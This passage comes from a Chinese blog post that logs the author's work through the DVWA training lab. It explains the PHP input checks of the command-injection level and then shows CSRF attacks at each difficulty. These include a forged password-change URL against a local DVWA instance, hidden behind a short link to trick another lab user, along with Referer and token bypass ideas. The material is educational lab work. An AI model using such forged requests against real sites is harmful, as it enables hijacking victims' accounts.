class="subst">&#123;$cmd&#125;</span>&lt;/pre&gt;&quot;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="comment">// Ops. Let the user name theres a mistake</span></span><br><span class="line">		<span class="variable">$html</span> .= <span class="string">&#x27;&lt;pre&gt;ERROR: You have entered an invalid IP.&lt;/pre&gt;&#x27;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Generate Anti-CSRF token</span></span><br><span class="line"><span class="title function_ invoke__">generateSessionToken</span>();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>知识点补充：</p>
<blockquote>
<p><code>explode()</code>函数是PHP的一个内置函数，用于将一个字符串根据指定的分隔符拆分成一个数组。它的语法如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span> <span class="title function_ invoke__">explode</span>(<span class="keyword">string</span> <span class="variable">$delimiter</span>, <span class="keyword">string</span> <span class="variable">$string</span>[, <span class="keyword">int</span> <span class="variable">$limit</span>])</span><br></pre></td></tr></table></figure>

<p>参数解释：</p>
<ul>
<li><code>$delimiter</code>：指定的分隔符，用于将字符串拆分成数组元素。</li>
<li><code>$string</code>：要拆分的原始字符串。</li>
<li><code>$limit</code>（可选）：限制拆分后的数组元素数量。</li>
</ul>
<p>在这段代码中，分隔符是<code>.</code>，原始字符串是<code>$target</code>。<code>explode()</code>函数会将<code>$target</code>字符串中的每个<code>.</code>作为分隔符，将字符串拆分成多个部分，并将这些部分存储在一个数组中。</p>
<p>拆分后的结果将存储在名为<code>$octet</code>的数组中。每个<code>$octet</code>数组元素都对应一个原始字符串中<code>.</code>分隔的部分。假设<code>$target</code>的值是<code>&quot;192.168.0.1&quot;</code>，那么<code>$octet</code>数组的内容将是<code>[&quot;192&quot;, &quot;168&quot;, &quot;0&quot;, &quot;1&quot;]</code>，即将IP地址的每个段拆分成一个数组元素。</p>
</blockquote>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">bool</span> <span class="title function_ invoke__">is_numeric</span>(<span class="keyword">mixed</span> <span class="variable">$var</span>)</span><br></pre></td></tr></table></figure>

<p>参数$var是要检查的变量。</p>
<p>当$var是一个数值或数值字符串时，is_numeric()函数将返回true，否则返回false。</p>
</blockquote>
<p>​    问题出在最后被分割的一个数组元素，它还包含着我们输入的连接符和命令所以不是数值，从而不满足条件，有点意思。</p>
<h1 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h1><blockquote>
<p><strong>Cross Site Request Forgery:跨站请求伪造</strong></p>
</blockquote>
<blockquote>
<p>贴上Pikachu靶场的概述:</p>
<ul>
<li>在CSRF的攻击场景中攻击者会伪造一个请求（这个请求一般是一个链接），然后欺骗目标用户进行点击，用户一旦点击了这个请求，整个攻击就完成了。所以CSRF攻击也成为”one click”攻击。 很多人搞不清楚CSRF的概念，甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。</li>
<li>我们判断一个网站是否存在CSRF漏洞，其实就是判断其对关键信息（比如密码等敏感信息）的操作(增删改)是否容易被伪造。</li>
<li>CSRF与XSS的区别：<strong>CSRF是借用户的权限完成攻击，攻击者并没有拿到用户的权限，而XSS是直接盗取到了用户的权限，然后实施破坏。</strong></li>
<li>网站如果要防止CSRF攻击，则需要对敏感信息的操作实施对应的安全措施，防止这些操作出现被伪造的情况，从而导致CSRF。比如：<ul>
<li>对敏感信息的操作增加安全的token；</li>
<li>对敏感信息的操作增加安全的验证码；</li>
<li>对敏感信息的操作实施安全的逻辑流程，比如修改密码时，需要先校验旧密码等。</li>
</ul>
</li>
</ul>
</blockquote>
<h2 id="Low-2"><a href="#Low-2" class="headerlink" title="Low"></a>Low</h2><blockquote>
<p>无任何防护措施</p>
</blockquote>
<p>当我们修改密码时候提交后URL变成了：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/DVWA/vulnerabilities/csrf/?password_new=admin&amp;password_conf=admin&amp;Change=Change#</span><br></pre></td></tr></table></figure>

<p>此时当我们登录另外一个账号</p>
<p><img lazyload alt="image" data-src="D:\Typora\typora-user-images\image-20230708140900314.png"></p>
<p>这里我选择user为1337的账号：<br>但是让该用户直接点击上面url难度比较大，我们尝试伪造成短链接：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://1i8.cn/kkyiM</span><br></pre></td></tr></table></figure>

<p>当用户点击此链接后密码就会被更改为<code>admin</code></p>
<p>我们登录验证一下：</p>
<p><img lazyload alt="image" data-src="D:\Typora\typora-user-images\image-20230708141447032.png"></p>
<p>修改成功</p>
<h2 id="Medium-2"><a href="#Medium-2" class="headerlink" title="Medium"></a>Medium</h2><p>当我如法炮制的时候出现了报错：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">That request didn&#x27;t look correct.</span><br></pre></td></tr></table></figure>

<p>应该是加入了某种校验机制?查看源码发现：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>( <span class="title function_ invoke__">stripos</span>( <span class="variable">$_SERVER</span>[ <span class="string">&#x27;HTTP_REFERER&#x27;</span> ] ,<span class="variable">$_SERVER</span>[ <span class="string">&#x27;SERVER_NAME&#x27;</span> ]) !== <span class="literal">false</span> ) &#123;</span><br></pre></td></tr></table></figure>

<p>​    即是增加了<code>referer</code>验证机制</p>
<blockquote>
<p><code>stripos()</code>是PHP的一个内置函数，用于在字符串中查找子字符串的第一次出现的位置（不区分大小写）。它返回子字符串在原始字符串中的位置索引，如果未找到则返回<code>false</code>。</p>
</blockquote>
<blockquote>
<p><code>stripos()</code>函数的语法如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span>|<span class="literal">false</span> <span class="title function_ invoke__">stripos</span>(<span class="keyword">string</span> <span class="variable">$haystack</span>, <span class="keyword">string</span> <span class="variable">$needle</span>[, <span class="keyword">int</span> <span class="variable">$offset</span> = <span class="number">0</span>])</span><br></pre></td></tr></table></figure>

<p>参数解释：</p>
<ul>
<li><code>$haystack</code>：要搜索的原始字符串。</li>
<li><code>$needle</code>：要查找的子字符串。</li>
<li><code>$offset</code>（可选）：指定搜索的起始位置，默认为0。</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$str</span> = <span class="string">&quot;Hello, World!&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$position1</span> = <span class="title function_ invoke__">stripos</span>(<span class="variable">$str</span>, <span class="string">&quot;world&quot;</span>);  <span class="comment">// 不区分大小写查找</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$position1</span>;  <span class="comment">// 输出: 7</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$position2</span> = <span class="title function_ invoke__">stripos</span>(<span class="variable">$str</span>, <span class="string">&quot;o&quot;</span>);  <span class="comment">// 不区分大小写查找</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$position2</span>;  <span class="comment">// 输出: 4</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$position3</span> = <span class="title function_ invoke__">stripos</span>(<span class="variable">$str</span>, <span class="string">&quot;Hello&quot;</span>, <span class="number">7</span>);  <span class="comment">// 从索引7开始查找</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$position3</span>;  <span class="comment">// 输出: false</span></span><br></pre></td></tr></table></figure>

<p>如果要进行大小写敏感的查找，请使用<code>strpos()</code>函数。它与<code>stripos()</code>函数的使用方法类似，但是区分大小写。</p>
</blockquote>
<p>​    我们当然可以自己手动用burp等工具添加referer头信息，从而成功修改密码，但是受害者不会做这种事情。CSRF的本质还是受害者在登陆状态下访问了我们伪造的页面链接后被getshell的情况。</p>
<p>​    详情参考：<a class="link" target="_blank" rel="noopener" href="https://www.sqlsec.com/2020/05/dvwa.html#Medium-2">click here<i class="fas fa-external-link-alt"></i></a></p>
<h2 id="High-2"><a href="#High-2" class="headerlink" title="High"></a>High</h2><p>同样的流程，不同的Url：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/DVWA/vulnerabilities/csrf/?password_new=admin&amp;password_conf=admin&amp;Change=Change&amp;user_token=3e3af1b6dbc164ac259ea1273e2e8907#</span><br></pre></td></tr></table></figure>

<p>看来是加入了<code>token验证机制</code></p>
<p>思路是：使用 XSS 来获取用户的 token ，然后将 token 放到 CSRF 的请求中。</p>
<p>详情请参考：<a class="link" target="_blank" rel="noopener" href="https://www.sqlsec.com/2020/05/dvwa.html#High-2">click here<i class="fas fa-external-link-alt"></i></a></p>
<h2 id="Impossible-2"><a href="#Impossible-2" class="headerlink" title="Impossible"></a>Impossible</h2><p>看下源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Check that the current password is correct</span></span><br><span class="line"><span class="variable">$data</span> = <span class="variable">$db</span>-&gt;<span class="title function_ invoke__">prepare</span>( <span class="string">&#x27;SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;&#x27;</span> );</span><br><span class="line"><span class="variable">$data</span>-&gt;<span class="title function_ invoke__">bindParam</span>( <span class="string">&#x27;:user&#x27;</span>, <span class="title function_ invoke__">dvwaCurrentUser</span>(), PDO::<span class="variable constant_">PARAM_STR</span> );</span><br><span class="line"><span class="variable">$data</span>-&gt;<span class="title function_ invoke__">bindParam</span>( <span class="string">&#x27;:password&#x27;</span>, <span class="variable">$pass_curr</span>, PDO::<span class="variable constant_">PARAM_STR</span> );</span><br><span class="line"><span class="variable">$data</span>-&gt;<span class="title function_ invoke__">execute</span>();</span><br></pre></td></tr></table></figure>

<p>学到了，安全地防注入。</p>
<p>此难度主要是采用了主流的验证当前密码是否正确后才能修改密码，而且也有<code>token验证机制</code>，安全性杠杠的。</p>
<h1 id="File-Inclusion"><a href="#File-Inclusion" class="headerlink" title="File Inclusion"></a>File Inclusion</h1>
            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li>
            <span class="type">本文标题</span>：<span class="content">DVMA靶场学习记录</span>
        </li>
        <li>
            <span class="type">本文作者</span>：<span class="content">二十八华生</span>
        </li>
        <li>
            <span class="type">创建时间</span>：<span class="content">2023-07-06 18:31:08</span>
        </li>
        <li class="post-link">
            <span class="type">本文链接</span>：<span class="content">2023/07/06/DVMA靶场学习记录/</span>
        </li>
        <li>
            <span class="type">版权声明</span>：<span class="content">本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！</span>
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/DVMA%E9%9D%B6%E5%9C%BA%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/">#DVMA靶场学习记录</a>&nbsp;
                        </li>
                    
                </ul>
            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                               rel="prev"
                               href="/2023/07/08/Pikachu%E9%9D%B6%E5%9C%BA%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/"
                            >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                                <span class="title flex-center">
                                <span class="post-nav-title-item">Pikachu靶场学习记录</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                               rel="next"
                               href="/2023/07/05/sqli-lab-%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E7%AF%87/"
                            >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">sqli-lab(手工注入篇)</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                                <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                            </a>
                        </div>
                    
                </div>
            

            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%9D%B6%E5%9C%BA%E4%BB%8B%E7%BB%8D"><span class="nav-text">靶场介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%88%91%E7%9A%84%E7%9B%AE%E6%A0%87"><span class="nav-text">我的目标</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Brute-Force"><span class="nav-text">Brute Force</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Low"><span class="nav-text">Low</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%88%E7%94%A8SQL%E6%B3%A8%E5%85%A5%E8%AF%95%E4%B8%80%E4%B8%8B"><span class="nav-text">先用SQL注入试一下</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%88%86%E7%A0%B4"><span class="nav-text">爆破</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Brup"><span class="nav-text">Brup</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Python"><span class="nav-text">Python</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Medium"><span class="nav-text">Medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#High"><span class="nav-text">High</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Python-1"><span class="nav-text">Python</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-text">(.*?)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#findall"><span class="nav-text">findall</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Burp"><span class="nav-text">Burp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Impossible"><span class="nav-text">Impossible</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Add"><span class="nav-text">Add</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Command-Injection"><span class="nav-text">Command Injection</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Low-1"><span class="nav-text">Low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Medium-1"><span class="nav-text">Medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#High-1"><span class="nav-text">High</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Impossible-1"><span class="nav-text">Impossible</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CSRF"><span class="nav-text">CSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Low-2"><span class="nav-text">Low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Medium-2"><span class="nav-text">Medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#High-2"><span class="nav-text">High</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Impossible-2"><span class="nav-text">Impossible</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#File-Inclusion"><span class="nav-text">File Inclusion</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            
<footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
                <span>2023</span> -
            
            2023
            
                &nbsp;<i class="fas fa-heart icon-animate"></i>
                &nbsp;<a href="/">二十八华生</a>
            
        </div>
        
            <script async data-pjax
                    src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                
                    总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.5.2</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/code-block.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/lazyload.js"></script>


<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/post-helper.js"></script>
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/libs/anime.min.js"></script>
        
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/toc.js"></script>
        
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
